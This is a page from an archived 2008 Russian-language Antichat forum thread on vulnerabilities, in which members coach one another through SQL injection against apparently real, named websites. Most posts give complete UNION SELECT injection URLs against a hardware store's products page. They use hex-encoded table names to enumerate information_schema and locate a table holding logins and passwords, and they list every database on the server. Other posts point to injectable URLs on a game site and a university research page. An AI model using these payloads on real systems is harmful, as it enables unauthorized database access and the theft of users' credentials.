ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1781  
Старый 24.04.2008, 19:09
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

Велемир из твоего поста понял процентов 10, а вообще:
Цитата:
А запрос похожий видел такой :

-1+union+select+1,2,table_name,4+from+information_s chema.tables+where+column_name=login_id--
такого запроса ты видеть не мог, т.к он нарушает синтаксис, очевидно login_id должно быть в hex либо к кавычках при маджик_квотс_гпс= Офф

Цитата:
И ещё: как выполнить запросы,чтобы к конкретной таблице показать конкретные колонки ?(а то хрен разберёшь)). Там цифры стоят возле каждой таблицы (4 или 2 2 2 2 2 2 )Я так понял,это количество полей в каждой таблице.
column_name+from+information_schema.columns+where+ table_name=hex(что -то)

Врят ли это колличество полей в таблице xD, видмо просто принтабельные колонки
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 

  #1782  
Старый 24.04.2008, 19:27
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

Ну а почему тогда tbmember,tblogin не существуют - это не таблицы чтоли ?(.

Кстати, если выполнить как ты сказал hex(abrakadabra), где абракадабра - имя таблицы,то вернёт 'Item comming soon',а если выполнить запрос сразу *хексанутый*, то выведет :

http://www.mooreindhardware.com/products.php?id=-1+union+select+1,2,column_name,4+from+information_ schema.columns+where+table_name=0x74626C5F70686F74 6F67616C6C657279--

0x74626C5F70686F746F67616C6C657279 - это tbl_photogallery.

P.S: При запросе http://www.mooreindhardware.com/products.php?id=-1+union+select+1,2,column_name,4+from+information_ schema.columns+where+table_name=0x74626C6F67696E-- ,где
0x74626C6F67696E - это tbmember, вернуло поля

login_id,login,password,user_name,access_level

Но при запросе

http://www.mooreindhardware.com/products.php?id=-1+union+select+1,2,user_name,4+from+tblogin--

Выдаёт,что таблица не найдена. Как тут быть ?( В Hex пробывал

Последний раз редактировалось Велемир; 24.04.2008 в 19:43..
 

  #1783  
Старый 24.04.2008, 20:07
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Велемир
Когда ты прочитаешь хоть одну статью по скулям?
Эта таблица в другой базе
И предполагая твой следующий вопрос:

база test_sql

Вот вывод всех баз:
_http://www.mooreindhardware.com/products.php?id=-5+union+select+1,2,schema_name,3+from+information_ schema.schemata--

Последний раз редактировалось jokester; 24.04.2008 в 20:12..
 

  #1784  
Старый 24.04.2008, 22:16
Doom123
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
Провел на форуме:
3941248

Репутация: 668


Отправить сообщение для Doom123 с помощью ICQ
По умолчанию

эньекция? http://www.line-age.ru/statistics.php?show_page=show_clan_info&indx=-1
 

  #1785  
Старый 24.04.2008, 22:48
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию

не так выразился ..

Последний раз редактировалось 159932; 25.04.2008 в 16:43.. Причина: не так выразился ..
 

  #1786  
Старый 25.04.2008, 11:00
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

159932, и что по твоему в этом странного?
 

  #1787  
Старый 25.04.2008, 11:18
krypt3r
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186

Репутация: 905


По умолчанию

159932, http://ru2.php.net/manual/ru/book.mssql.php
 

  #1788  
Старый 25.04.2008, 11:35
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

гг, вот что действительно странно

Цитата:
Spyder (17:17:53 12/03/2008)
Warning: mssql_query() [function.mssql-query]: message: Line 1: Incorrect syntax near '\'. (severity 15) in /bigdisk/www/html/research/alcator/program/cmod_runs.php on line 119


Spyder (17:18:07 12/03/2008)
меня глючит или это мсскл на линухе?


ettee (17:19:30 12/03/2008)
ой,спудер...


ettee (17:19:32 12/03/2008)
ом


ettee (17:19:37 12/03/2008)
наебывают?


Spyder (17:19:40 12/03/2008)
я хз


Spyder (17:20:37 12/03/2008)
http://www.psfc.mit.edu/research/alcator/program/cmod_runs.php?run=1050525'
 

  #1789  
Старый 25.04.2008, 11:40
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Цитата:
Сообщение от GrAmOzEkA  
это значит system отключено, юзай include
поржал)

Последний раз редактировалось Spyder; 25.04.2008 в 11:42..
 

  #1790  
Старый 25.04.2008, 11:46
Macro
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062

Репутация: 1079


По умолчанию

Spyder, mssql может быть удаленно расположенной бд
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ